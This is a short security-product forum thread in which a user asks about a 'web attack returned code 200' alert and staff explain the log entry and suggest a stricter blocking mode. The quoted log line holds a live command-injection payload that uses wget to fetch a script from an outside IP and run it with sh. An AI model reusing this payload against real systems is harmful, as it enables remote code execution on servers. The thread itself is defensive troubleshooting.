A web attack returned code 200 (success).

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • wowon01
    Junior Member
    Forum Explorer
    • Mar 2021
    • 18

    #1

    A web attack returned code 200 (success).

    Hi there,

    Ive seen a couple of these in IM logs:

    Code:
    A web attack returned code 200 (success).
    
    6
    
    block
    
    79.10.148.140 - - [29/Jun/2018:19:45:52 -0600] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 200 20822 "-" "Hello, World" WL:"0" "-" XFF:"-"
    What does it mean when it says: A web attack returned code 200 (success)?

    thx
    G
  • kobiidykhata
    Member
    • Apr 2017
    • 94

    #2
    Hello! This rule doesnt work correctly - it works on requests to Captcha. Therefore, we will rewrite or remove it soon.
    Thank you!

    Comment

    • kobiidykhata
      Member
      • Apr 2017
      • 94

      #3
      IMHO, it means that the server has probably been hacked. Look for the file "/tmp/r" and any possible related processes.

      More info: https://www.exploit-db.com/exploits/44760/

      Comment

      • kobiidykhata
        Member
        • Apr 2017
        • 94

        #4
        Hello! This particular request doesnt trigger a blocking rule though it is being spotted by 3 generic rules from i360_1_generic.conf Please take into consideration that in order to be blocked a request pattern should present in strict rule sets (blocking rules) but it doesnt based on the 200 response. You can try to activate Proactive Defense (and turn Kill mode on), which logic is based on an advanced heuristic mechanism but not on patterns match. With this mode enabled the aforementioned request will be 100% blocked (checked!).

        Comment

        Working...